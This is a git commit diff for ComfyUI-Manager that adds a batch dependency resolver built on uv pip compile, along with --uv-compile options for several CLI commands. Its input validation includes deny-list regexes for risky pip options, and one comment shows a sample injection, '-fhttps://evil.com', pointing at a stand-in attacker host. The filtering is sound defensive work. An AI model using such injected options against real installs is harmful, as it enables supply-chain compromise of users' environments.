feat(deps): add unified dependency resolver with uv pip compile

Add UnifiedDepResolver that batch-resolves all custom node pack
dependencies via uv pip compile, replacing per-node pip installs.

Core features:
- Collect, sanitize, and compile requirements from all node packs
- Input validation with regex-based sanitization and blacklist/override support
- Conflict detection with per-node-pack attribution output
- CollectedDeps.sources stores (pack_path, pkg_spec) tuples for attribution
- Startup integration via prestartup_script.py with fallback to legacy path
- --uv-compile flag on 8 CLI commands: uv-compile, install, reinstall,
  update, fix, restore-snapshot, restore-dependencies, install-deps

Testing:
- 148 unit tests (mock-based) covering all resolver logic
- 12 E2E pytest tests using ltdrdata's dedicated conflict test packs
- E2E environment setup scripts (setup, start, stop)
- Supply-chain safety policy: only verified authors' packs in E2E

Documentation:
- PRD and DESIGN specs for the resolver
- EN/KO cm-cli user docs updated for all new commands
- Test documentation and environment setup guide

Bump version to 4.1b3.
This commit is contained in:
Dr.Lt.Data 2026-03-10 23:37:57 +09:00
parent 0d88a3874d
commit 11c5f0ad90
18 changed files with 5382 additions and 28 deletions

4
.gitignore vendored
View File

@ -21,4 +21,6 @@ check2.sh
build
dist
*.egg-info
.env
.env
.claude
test_venv

View File

@ -656,6 +656,14 @@ def install(
help="Skip installing any Python dependencies",
),
] = False,
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After installing, batch-resolve all dependencies via uv pip compile",
),
] = False,
user_directory: str = typer.Option(
None,
help="user directory"
@ -667,11 +675,34 @@ def install(
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
cmd_ctx.set_no_deps(no_deps)
if uv_compile and no_deps:
print("[bold red]--uv-compile and --no-deps are mutually exclusive.[/bold red]")
raise typer.Exit(1)
if uv_compile:
cmd_ctx.set_no_deps(True)
else:
cmd_ctx.set_no_deps(no_deps)
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
for_each_nodes(nodes, act=install_node, exit_on_fail=exit_on_fail)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command(help="Reinstall custom nodes")
@ -698,6 +729,14 @@ def reinstall(
help="Skip installing any Python dependencies",
),
] = False,
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After reinstalling, batch-resolve all dependencies via uv pip compile",
),
] = False,
user_directory: str = typer.Option(
None,
help="user directory"
@ -705,11 +744,34 @@ def reinstall(
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
cmd_ctx.set_no_deps(no_deps)
if uv_compile and no_deps:
print("[bold red]--uv-compile and --no-deps are mutually exclusive.[/bold red]")
raise typer.Exit(1)
if uv_compile:
cmd_ctx.set_no_deps(True)
else:
cmd_ctx.set_no_deps(no_deps)
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
for_each_nodes(nodes, act=reinstall_node)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command(help="Uninstall custom nodes")
@ -754,10 +816,21 @@ def update(
None,
help="user directory"
),
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After updating, batch-resolve all dependencies via uv pip compile",
),
] = False,
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
if uv_compile:
cmd_ctx.set_no_deps(True)
if 'all' in nodes:
asyncio.run(auto_save_snapshot())
@ -769,7 +842,22 @@ def update(
break
update_parallel(nodes)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command(help="Disable custom nodes")
@ -855,16 +943,42 @@ def fix(
None,
help="user directory"
),
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After fixing, batch-resolve all dependencies via uv pip compile",
),
] = False,
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
if uv_compile:
cmd_ctx.set_no_deps(True)
if 'all' in nodes:
asyncio.run(auto_save_snapshot())
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
for_each_nodes(nodes, fix_node, allow_all=True)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command("show-versions", help="Show all available versions of the node")
@ -1061,7 +1175,7 @@ def save_snapshot(
@app.command("restore-snapshot", help="Restore snapshot from snapshot file")
def restore_snapshot(
snapshot_name: str,
snapshot_name: str,
pip_non_url: Optional[bool] = typer.Option(
default=None,
show_default=False,
@ -1087,13 +1201,24 @@ def restore_snapshot(
restore_to: Optional[str] = typer.Option(
None,
help="Manually specify the installation path for the custom node. Ignore user directory."
)
),
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After restoring, batch-resolve all dependencies via uv pip compile",
),
] = False,
):
cmd_ctx.set_user_directory(user_directory)
if restore_to:
cmd_ctx.update_custom_nodes_dir(restore_to)
if uv_compile:
cmd_ctx.set_no_deps(True)
extras = []
if pip_non_url:
extras.append('--pip-non-url')
@ -1120,8 +1245,25 @@ def restore_snapshot(
except Exception:
print("[bold red]ERROR: Failed to restore snapshot.[/bold red]")
traceback.print_exc()
if uv_compile:
pip_fixer.fix_broken()
raise typer.Exit(code=1)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command(
@ -1131,10 +1273,21 @@ def restore_dependencies(
user_directory: str = typer.Option(
None,
help="user directory"
)
),
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After restoring, batch-resolve all dependencies via uv pip compile",
),
] = False,
):
cmd_ctx.set_user_directory(user_directory)
if uv_compile:
cmd_ctx.set_no_deps(True)
node_paths = []
for base_path in cmd_ctx.get_custom_nodes_paths():
@ -1150,9 +1303,24 @@ def restore_dependencies(
for x in node_paths:
print("----------------------------------------------------------------------------------------------------")
print(f"Restoring [{i}/{total}]: {x}")
unified_manager.execute_install_script('', x, instant_execution=True)
unified_manager.execute_install_script('', x, instant_execution=True, no_deps=bool(uv_compile))
i += 1
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
@app.command(
@ -1193,9 +1361,21 @@ def install_deps(
None,
help="user directory"
),
uv_compile: Annotated[
Optional[bool],
typer.Option(
"--uv-compile",
show_default=False,
help="After installing, batch-resolve all dependencies via uv pip compile",
),
] = False,
):
cmd_ctx.set_user_directory(user_directory)
cmd_ctx.set_channel_mode(channel, mode)
if uv_compile:
cmd_ctx.set_no_deps(True)
asyncio.run(auto_save_snapshot())
if not os.path.exists(deps):
@ -1215,14 +1395,114 @@ def install_deps(
if state == 'installed':
continue
elif state == 'not-installed':
asyncio.run(core.gitclone_install(k, instant_execution=True))
asyncio.run(core.gitclone_install(k, instant_execution=True, no_deps=bool(uv_compile)))
else: # disabled
core.gitclone_set_active([k], False)
pip_fixer.fix_broken()
if uv_compile:
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Batch resolution failed: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
else:
pip_fixer.fix_broken()
print("Dependency installation and activation complete.")
def _run_unified_resolve():
"""Shared logic for unified batch dependency resolution."""
from comfyui_manager.common.unified_dep_resolver import (
UnifiedDepResolver,
UvNotAvailableError,
collect_base_requirements,
collect_node_pack_paths,
)
node_pack_paths = collect_node_pack_paths(cmd_ctx.get_custom_nodes_paths())
if not node_pack_paths:
print("[bold yellow]No custom node packs found.[/bold yellow]")
return
print(f"Resolving dependencies for {len(node_pack_paths)} node pack(s)...")
resolver = UnifiedDepResolver(
node_pack_paths=node_pack_paths,
base_requirements=collect_base_requirements(comfy_path),
blacklist=cm_global.pip_blacklist,
overrides=cm_global.pip_overrides,
downgrade_blacklist=cm_global.pip_downgrade_blacklist,
)
try:
result = resolver.resolve_and_install()
except UvNotAvailableError:
print("[bold red]uv is not available. Install uv to use this feature.[/bold red]")
raise typer.Exit(1)
if result.success:
collected = result.collected
if collected:
print(
f"[bold green]Resolved {len(collected.requirements)} deps "
f"from {len(collected.sources)} source(s) "
f"(skipped {len(collected.skipped)}).[/bold green]"
)
else:
print("[bold green]Resolution complete (no deps needed).[/bold green]")
else:
print(f"[bold red]Resolution failed: {result.error}[/bold red]")
# Show which node packs requested each conflicting package.
if result.lockfile and result.lockfile.conflicts and result.collected:
conflict_text = "\n".join(result.lockfile.conflicts).lower().replace("-", "_")
attributed = {
pkg: reqs
for pkg, reqs in result.collected.sources.items()
if re.search(r'(?<![a-z0-9_])' + re.escape(pkg.lower().replace("-", "_")) + r'(?![a-z0-9_])', conflict_text)
}
if attributed:
print("[bold yellow]Conflicting packages (by node pack):[/bold yellow]")
for pkg_name, requesters in sorted(attributed.items()):
print(f" [yellow]{pkg_name}[/yellow]:")
for pack_path, pkg_spec in requesters:
print(f" {os.path.basename(pack_path)}{pkg_spec}")
raise typer.Exit(1)
@app.command(
"uv-compile",
help="Batch-resolve and install all custom node dependencies via uv pip compile.",
)
def unified_uv_compile(
user_directory: str = typer.Option(
None,
help="user directory"
),
):
cmd_ctx.set_user_directory(user_directory)
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), comfy_path, context.manager_files_path)
try:
_run_unified_resolve()
except ImportError as e:
print(f"[bold red]Failed to import unified_dep_resolver: {e}[/bold red]")
raise typer.Exit(1)
except typer.Exit:
raise
except Exception as e:
print(f"[bold red]Unexpected error: {e}[/bold red]")
raise typer.Exit(1)
finally:
pip_fixer.fix_broken()
@app.command(help="Clear reserved startup action in ComfyUI-Manager")
def clear():
cancel()

View File

@ -25,6 +25,7 @@ comfyui_manager_path = os.path.abspath(os.path.join(os.path.dirname(__file__), '
cache_dir = os.path.join(comfyui_manager_path, '.cache') # This path is also updated together in **manager_core.update_user_directory**.
use_uv = False
use_unified_resolver = False
bypass_ssl = False
def is_manager_pip_package():

View File

@ -0,0 +1,704 @@
"""Unified Dependency Resolver for ComfyUI Manager.
Resolves and installs all node-pack dependencies at once using ``uv pip compile``
followed by ``uv pip install -r``, replacing per-node-pack ``pip install`` calls.
Responsibility scope
--------------------
- Dependency collection, resolution, and installation **only**.
- ``install.py`` execution and ``PIPFixer`` calls are the caller's responsibility.
See Also
--------
- docs/dev/PRD-unified-dependency-resolver.md
- docs/dev/DESIGN-unified-dependency-resolver.md
"""
from __future__ import annotations
import logging
import os
import re
import shutil
import subprocess
import sys
import tempfile
import time
from collections import defaultdict
from dataclasses import dataclass, field
from . import manager_util
logger = logging.getLogger("ComfyUI-Manager")
# ---------------------------------------------------------------------------
# Exceptions
# ---------------------------------------------------------------------------
class UvNotAvailableError(RuntimeError):
"""Raised when neither ``python -m uv`` nor standalone ``uv`` is found."""
# ---------------------------------------------------------------------------
# Data classes
# ---------------------------------------------------------------------------
@dataclass
class PackageRequirement:
"""Individual package dependency."""
name: str # Normalised package name
spec: str # Original spec string (e.g. ``torch>=2.0``)
source: str # Absolute path of the source node pack
@dataclass
class CollectedDeps:
"""Aggregated dependency collection result."""
requirements: list[PackageRequirement] = field(default_factory=list)
skipped: list[tuple[str, str]] = field(default_factory=list)
sources: dict[str, list[tuple[str, str]]] = field(default_factory=dict)
"""pkg_name → [(pack_path, pkg_spec), ...] — tracks which node packs request each package."""
extra_index_urls: list[str] = field(default_factory=list)
@dataclass
class LockfileResult:
"""Result of ``uv pip compile``."""
success: bool
lockfile_path: str | None = None
conflicts: list[str] = field(default_factory=list)
stderr: str = ""
@dataclass
class InstallResult:
"""Result of ``uv pip install -r`` (atomic: all-or-nothing)."""
success: bool
installed: list[str] = field(default_factory=list)
skipped: list[str] = field(default_factory=list)
stderr: str = ""
@dataclass
class ResolveResult:
"""Full pipeline result."""
success: bool
collected: CollectedDeps | None = None
lockfile: LockfileResult | None = None
install: InstallResult | None = None
error: str | None = None
# ---------------------------------------------------------------------------
# Resolver
# ---------------------------------------------------------------------------
_TMP_PREFIX = "comfyui_resolver_"
# Security: reject dangerous requirement patterns at line start.
# NOTE: This regex is intentionally kept alongside _INLINE_DANGEROUS_OPTIONS
# because it covers ``@ file://`` via ``.*@\s*file://`` which relies on the
# ``^`` anchor. Both regexes share responsibility for option rejection:
# this one catches line-start patterns; _INLINE_DANGEROUS_OPTIONS catches
# options appearing after a package name.
_DANGEROUS_PATTERNS = re.compile(
r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
r'|--find-links\b|-f\b|.*@\s*file://)',
re.IGNORECASE,
)
# Security: reject dangerous pip options appearing anywhere in the line
# (supplements the ^-anchored _DANGEROUS_PATTERNS which only catches line-start).
# The ``(?:^|\s)`` prefix prevents false positives on hyphenated package names
# (e.g. ``re-crypto``, ``package[extra-c]``) while still catching concatenated
# short-flag attacks like ``-fhttps://evil.com``.
_INLINE_DANGEROUS_OPTIONS = re.compile(
r'(?:^|\s)(--find-links\b|--constraint\b|--requirement\b|--editable\b'
r'|--trusted-host\b|--global-option\b|--install-option\b'
r'|-f|-r|-e|-c)',
re.IGNORECASE,
)
# Credential redaction in index URLs.
_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')
# Version-spec parsing (same regex as existing ``is_blacklisted()``).
_VERSION_SPEC_PATTERN = re.compile(r'([^<>!~=]+)([<>!~=]=?)([^ ]*)')
def collect_node_pack_paths(custom_nodes_dirs: list[str]) -> list[str]:
"""Collect all installed node-pack directory paths.
Parameters
----------
custom_nodes_dirs:
Base directories returned by ``folder_paths.get_folder_paths('custom_nodes')``.
Returns
-------
list[str]
Paths of node-pack directories (immediate subdirectories of each base).
"""
paths: list[str] = []
for base in custom_nodes_dirs:
if os.path.isdir(base):
for name in os.listdir(base):
fullpath = os.path.join(base, name)
if os.path.isdir(fullpath):
paths.append(fullpath)
return paths
def collect_base_requirements(comfy_path: str) -> list[str]:
"""Read ComfyUI's own base requirements as constraint lines.
Reads ``requirements.txt`` and ``manager_requirements.txt`` from *comfy_path*.
These are ComfyUI-level dependencies only never read from node packs.
Parameters
----------
comfy_path:
Root directory of the ComfyUI installation.
Returns
-------
list[str]
Non-empty, non-comment requirement lines.
"""
reqs: list[str] = []
for filename in ("requirements.txt", "manager_requirements.txt"):
req_path = os.path.join(comfy_path, filename)
if os.path.exists(req_path):
with open(req_path, encoding="utf-8") as f:
reqs.extend(
line.strip() for line in f
if line.strip() and not line.strip().startswith('#')
)
return reqs
class UnifiedDepResolver:
"""Unified dependency resolver.
Resolves and installs all dependencies of (installed + new) node packs at
once using *uv*.
Parameters
----------
node_pack_paths:
Absolute paths of node-pack directories to consider.
base_requirements:
Lines from ComfyUI's own ``requirements.txt`` (used as constraints).
blacklist:
Package names to skip unconditionally (default: ``cm_global.pip_blacklist``).
overrides:
Package-name remapping dict (default: ``cm_global.pip_overrides``).
downgrade_blacklist:
Packages whose installed versions must not be downgraded
(default: ``cm_global.pip_downgrade_blacklist``).
"""
def __init__(
self,
node_pack_paths: list[str],
base_requirements: list[str] | None = None,
blacklist: set[str] | None = None,
overrides: dict[str, str] | None = None,
downgrade_blacklist: list[str] | None = None,
) -> None:
self.node_pack_paths = node_pack_paths
self.base_requirements = base_requirements or []
self.blacklist: set[str] = blacklist if blacklist is not None else set()
self.overrides: dict[str, str] = overrides if overrides is not None else {}
self.downgrade_blacklist: list[str] = (
downgrade_blacklist if downgrade_blacklist is not None else []
)
# ------------------------------------------------------------------
# Public API
# ------------------------------------------------------------------
def resolve_and_install(self) -> ResolveResult:
"""Execute the full pipeline: cleanup → collect → compile → install."""
self.cleanup_stale_tmp()
tmp_dir: str | None = None
try:
# 1. Collect
collected = self.collect_requirements()
if not collected.requirements:
logger.info("[UnifiedDepResolver] No dependencies to resolve")
return ResolveResult(success=True, collected=collected)
logger.info(
"[UnifiedDepResolver] Collected %d deps from %d sources (skipped %d)",
len(collected.requirements),
len(collected.sources),
len(collected.skipped),
)
# 2. Compile
lockfile = self.compile_lockfile(collected)
if not lockfile.success:
return ResolveResult(
success=False,
collected=collected,
lockfile=lockfile,
error=f"compile failed: {'; '.join(lockfile.conflicts)}",
)
# tmp_dir is the parent of lockfile_path
tmp_dir = os.path.dirname(lockfile.lockfile_path) # type: ignore[arg-type]
# 3. Install
install = self.install_from_lockfile(lockfile.lockfile_path) # type: ignore[arg-type]
return ResolveResult(
success=install.success,
collected=collected,
lockfile=lockfile,
install=install,
error=install.stderr if not install.success else None,
)
except UvNotAvailableError:
raise
except Exception as exc:
logger.warning("[UnifiedDepResolver] unexpected error: %s", exc)
return ResolveResult(success=False, error=str(exc))
finally:
if tmp_dir and os.path.isdir(tmp_dir):
shutil.rmtree(tmp_dir, ignore_errors=True)
# ------------------------------------------------------------------
# Step 1: collect
# ------------------------------------------------------------------
def collect_requirements(self) -> CollectedDeps:
"""Collect dependencies from all node packs."""
requirements: list[PackageRequirement] = []
skipped: list[tuple[str, str]] = []
sources: defaultdict[str, list[tuple[str, str]]] = defaultdict(list)
extra_index_urls: list[str] = []
# Snapshot installed packages once to avoid repeated subprocess calls.
# Skip when downgrade_blacklist is empty (the common default).
installed_snapshot = (
manager_util.get_installed_packages()
if self.downgrade_blacklist else {}
)
for pack_path in self.node_pack_paths:
# Exclude disabled node packs (directory-based mechanism).
if self._is_disabled_path(pack_path):
continue
req_file = os.path.join(pack_path, "requirements.txt")
if not os.path.exists(req_file):
continue
for raw_line in self._read_requirements(req_file):
line = raw_line.split('#')[0].strip()
if not line:
continue
# 0. Security: reject dangerous patterns
if _DANGEROUS_PATTERNS.match(line):
skipped.append((line, f"rejected: dangerous pattern in {pack_path}"))
logger.warning(
"[UnifiedDepResolver] rejected dangerous line: '%s' from %s",
line, pack_path,
)
continue
# 1. Separate --index-url / --extra-index-url handling
# (before path separator check, because URLs contain '/')
# URLs are staged but NOT committed until the line passes
# all validation (prevents URL injection from rejected lines).
pending_urls: list[str] = []
if '--index-url' in line or '--extra-index-url' in line:
pkg_spec, pending_urls = self._split_index_url(line)
line = pkg_spec
if not line:
# Standalone option line (no package prefix) — safe
extra_index_urls.extend(pending_urls)
continue
# 1b. Reject dangerous pip options appearing after package name
# (--index-url/--extra-index-url already extracted above)
if _INLINE_DANGEROUS_OPTIONS.search(line):
skipped.append((line, f"rejected: inline pip option in {pack_path}"))
logger.warning(
"[UnifiedDepResolver] rejected inline pip option: '%s' from %s",
line, pack_path,
)
continue
# Reject path separators in package name portion
pkg_name_part = re.split(r'[><=!~;]', line)[0]
if '/' in pkg_name_part or '\\' in pkg_name_part:
skipped.append((line, "rejected: path separator in package name"))
logger.warning(
"[UnifiedDepResolver] rejected path separator: '%s' from %s",
line, pack_path,
)
continue
# 2. Remap package name
pkg_spec = self._remap_package(line)
# 3. Extract normalised name
pkg_name = self._extract_package_name(pkg_spec)
# 4. Blacklist check
if pkg_name in self.blacklist:
skipped.append((pkg_spec, "blacklisted"))
continue
# 5. Downgrade blacklist check
if self._is_downgrade_blacklisted(pkg_name, pkg_spec,
installed_snapshot):
skipped.append((pkg_spec, "downgrade blacklisted"))
continue
# 6. Collect (no dedup — uv handles resolution)
requirements.append(
PackageRequirement(name=pkg_name, spec=pkg_spec, source=pack_path)
)
sources[pkg_name].append((pack_path, pkg_spec))
# Commit staged index URLs only after all validation passed.
if pending_urls:
extra_index_urls.extend(pending_urls)
return CollectedDeps(
requirements=requirements,
skipped=skipped,
sources=dict(sources),
extra_index_urls=list(set(extra_index_urls)),
)
# ------------------------------------------------------------------
# Step 2: compile
# ------------------------------------------------------------------
def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
"""Generate pinned requirements via ``uv pip compile``."""
tmp_dir = tempfile.mkdtemp(prefix=_TMP_PREFIX)
try:
# Write temp requirements
tmp_req = os.path.join(tmp_dir, "input-requirements.txt")
with open(tmp_req, "w", encoding="utf-8") as fh:
for req in deps.requirements:
fh.write(req.spec + "\n")
# Write constraints (base dependencies)
tmp_constraints: str | None = None
if self.base_requirements:
tmp_constraints = os.path.join(tmp_dir, "constraints.txt")
with open(tmp_constraints, "w", encoding="utf-8") as fh:
for line in self.base_requirements:
fh.write(line.strip() + "\n")
lockfile_path = os.path.join(tmp_dir, "resolved-requirements.txt")
cmd = self._get_uv_cmd() + [
"pip", "compile",
tmp_req,
"--output-file", lockfile_path,
"--python", sys.executable,
]
if tmp_constraints:
cmd += ["--constraint", tmp_constraints]
for url in deps.extra_index_urls:
logger.info(
"[UnifiedDepResolver] extra-index-url: %s",
self._redact_url(url),
)
cmd += ["--extra-index-url", url]
logger.info("[UnifiedDepResolver] running: %s", " ".join(
self._redact_url(c) for c in cmd
))
try:
result = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=300,
)
except subprocess.TimeoutExpired:
logger.warning("[UnifiedDepResolver] uv pip compile timed out (300s)")
return LockfileResult(
success=False,
conflicts=["compile timeout exceeded (300s)"],
stderr="TimeoutExpired",
)
if result.returncode != 0:
conflicts = self._parse_conflicts(result.stderr)
return LockfileResult(
success=False,
conflicts=conflicts,
stderr=result.stderr,
)
if not os.path.exists(lockfile_path):
return LockfileResult(
success=False,
conflicts=["lockfile not created despite success return code"],
stderr=result.stderr,
)
return LockfileResult(success=True, lockfile_path=lockfile_path)
except UvNotAvailableError:
shutil.rmtree(tmp_dir, ignore_errors=True)
raise
except Exception:
shutil.rmtree(tmp_dir, ignore_errors=True)
raise
# ------------------------------------------------------------------
# Step 3: install
# ------------------------------------------------------------------
def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
"""Install from pinned requirements (``uv pip install -r``).
Do **not** use ``uv pip sync`` it deletes packages not in the
lockfile, risking removal of torch, ComfyUI deps, etc.
"""
cmd = self._get_uv_cmd() + [
"pip", "install",
"--requirement", lockfile_path,
"--python", sys.executable,
]
logger.info("[UnifiedDepResolver] running: %s", " ".join(cmd))
try:
result = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=600,
)
except subprocess.TimeoutExpired:
logger.warning("[UnifiedDepResolver] uv pip install timed out (600s)")
return InstallResult(
success=False,
stderr="TimeoutExpired: install exceeded 600s",
)
installed, skipped_pkgs = self._parse_install_output(result)
return InstallResult(
success=result.returncode == 0,
installed=installed,
skipped=skipped_pkgs,
stderr=result.stderr if result.returncode != 0 else "",
)
# ------------------------------------------------------------------
# uv command resolution
# ------------------------------------------------------------------
def _get_uv_cmd(self) -> list[str]:
"""Determine the ``uv`` command to use.
``python_embeded`` spelling is intentional matches the actual path
name in the ComfyUI Windows distribution.
"""
embedded = 'python_embeded' in sys.executable
# 1. Try uv as a Python module
try:
test_cmd = (
[sys.executable]
+ (['-s'] if embedded else [])
+ ['-m', 'uv', '--version']
)
subprocess.check_output(test_cmd, stderr=subprocess.DEVNULL, timeout=5)
return [sys.executable] + (['-s'] if embedded else []) + ['-m', 'uv']
except Exception:
pass
# 2. Standalone uv executable
if shutil.which('uv'):
return ['uv']
raise UvNotAvailableError("uv is not available")
# ------------------------------------------------------------------
# Helpers — collection
# ------------------------------------------------------------------
@staticmethod
def _is_disabled_path(path: str) -> bool:
"""Return ``True`` if *path* is within a ``.disabled`` directory."""
# New style: custom_nodes/.disabled/{name}
if '/.disabled/' in path or os.path.basename(os.path.dirname(path)) == '.disabled':
return True
# Old style: {name}.disabled suffix
if path.rstrip('/').endswith('.disabled'):
return True
return False
@staticmethod
def _read_requirements(filepath: str) -> list[str]:
"""Read requirements file using ``robust_readlines`` pattern."""
return manager_util.robust_readlines(filepath)
@staticmethod
def _split_index_url(line: str) -> tuple[str, list[str]]:
"""Split index-url options from a requirement line.
Handles lines with one or more ``--index-url`` / ``--extra-index-url``
options. Returns ``(package_spec, [url, ...])``.
Examples::
"torch --extra-index-url U1 --index-url U2"
("torch", ["U1", "U2"])
"--index-url URL"
("", ["URL"])
"""
urls: list[str] = []
remainder_tokens: list[str] = []
# Regex: match --extra-index-url or --index-url followed by its value
option_re = re.compile(
r'(--(?:extra-)?index-url)\s+(\S+)'
)
# Pattern for bare option flags without a URL value
bare_option_re = re.compile(r'^--(?:extra-)?index-url$')
last_end = 0
for m in option_re.finditer(line):
# Text before this option is part of the package spec
before = line[last_end:m.start()].strip()
if before:
remainder_tokens.append(before)
urls.append(m.group(2))
last_end = m.end()
# Trailing text after last option
trailing = line[last_end:].strip()
if trailing:
remainder_tokens.append(trailing)
# Strip any bare option flags that leaked into remainder tokens
# (e.g. "--index-url" with no URL value after it)
remainder_tokens = [
t for t in remainder_tokens if not bare_option_re.match(t)
]
pkg_spec = " ".join(remainder_tokens).strip()
return pkg_spec, urls
def _remap_package(self, pkg: str) -> str:
"""Apply ``pip_overrides`` remapping."""
if pkg in self.overrides:
remapped = self.overrides[pkg]
logger.info("[UnifiedDepResolver] '%s' remapped to '%s'", pkg, remapped)
return remapped
return pkg
@staticmethod
def _extract_package_name(spec: str) -> str:
"""Extract normalised package name from a requirement spec."""
name = re.split(r'[><=!~;\[@ ]', spec)[0].strip()
return name.lower().replace('-', '_')
def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str,
installed: dict) -> bool:
"""Reproduce the downgrade logic from ``is_blacklisted()``.
Uses ``manager_util.StrictVersion`` **not** ``packaging.version``.
Args:
installed: Pre-fetched snapshot from
``manager_util.get_installed_packages()``.
"""
if pkg_name not in self.downgrade_blacklist:
return False
match = _VERSION_SPEC_PATTERN.search(pkg_spec)
if match is None:
# No version spec: prevent reinstall if already installed
if pkg_name in installed:
return True
elif match.group(2) in ('<=', '==', '<', '~='):
if pkg_name in installed:
try:
installed_ver = manager_util.StrictVersion(installed[pkg_name])
requested_ver = manager_util.StrictVersion(match.group(3))
if installed_ver >= requested_ver:
return True
except (ValueError, TypeError):
logger.warning(
"[UnifiedDepResolver] version parse failed: %s", pkg_spec,
)
return False
return False
# ------------------------------------------------------------------
# Helpers — parsing & output
# ------------------------------------------------------------------
@staticmethod
def _parse_conflicts(stderr: str) -> list[str]:
"""Extract conflict descriptions from ``uv pip compile`` stderr."""
conflicts: list[str] = []
for line in stderr.splitlines():
line = line.strip()
if line and ('conflict' in line.lower() or 'error' in line.lower()):
conflicts.append(line)
return conflicts or [stderr.strip()] if stderr.strip() else []
@staticmethod
def _parse_install_output(
result: subprocess.CompletedProcess[str],
) -> tuple[list[str], list[str]]:
"""Parse ``uv pip install`` stdout for installed/skipped packages."""
installed: list[str] = []
skipped_pkgs: list[str] = []
for line in result.stdout.splitlines():
line_lower = line.strip().lower()
if 'installed' in line_lower or 'updated' in line_lower:
installed.append(line.strip())
elif 'already' in line_lower or 'satisfied' in line_lower:
skipped_pkgs.append(line.strip())
return installed, skipped_pkgs
@staticmethod
def _redact_url(url: str) -> str:
"""Mask ``user:pass@`` credentials in URLs."""
return _CREDENTIAL_PATTERN.sub('://****@', url)
# ------------------------------------------------------------------
# Temp-file housekeeping
# ------------------------------------------------------------------
@classmethod
def cleanup_stale_tmp(cls, max_age_seconds: int = 3600) -> None:
"""Remove stale temp directories from previous abnormal terminations."""
tmp_root = tempfile.gettempdir()
now = time.time()
for entry in os.scandir(tmp_root):
if entry.is_dir() and entry.name.startswith(_TMP_PREFIX):
try:
age = now - entry.stat().st_mtime
if age > max_age_seconds:
shutil.rmtree(entry.path, ignore_errors=True)
logger.info(
"[UnifiedDepResolver] cleaned stale tmp: %s", entry.path,
)
except OSError:
pass

View File

@ -843,7 +843,10 @@ class UnifiedManager:
install_cmd = ["#LAZY-INSTALL-SCRIPT", sys.executable]
return try_install_script(url, repo_path, install_cmd)
else:
if os.path.exists(requirements_path) and not no_deps:
if not no_deps and manager_util.use_unified_resolver:
# Unified mode: skip per-node pip install (deps resolved at startup batch)
logging.info("[UnifiedDepResolver] deps deferred to startup batch resolution for %s", repo_path)
elif os.path.exists(requirements_path) and not no_deps:
print("Install: pip packages")
pip_fixer = manager_util.PIPFixer(manager_util.get_installed_packages(), context.comfy_path, context.manager_files_path)
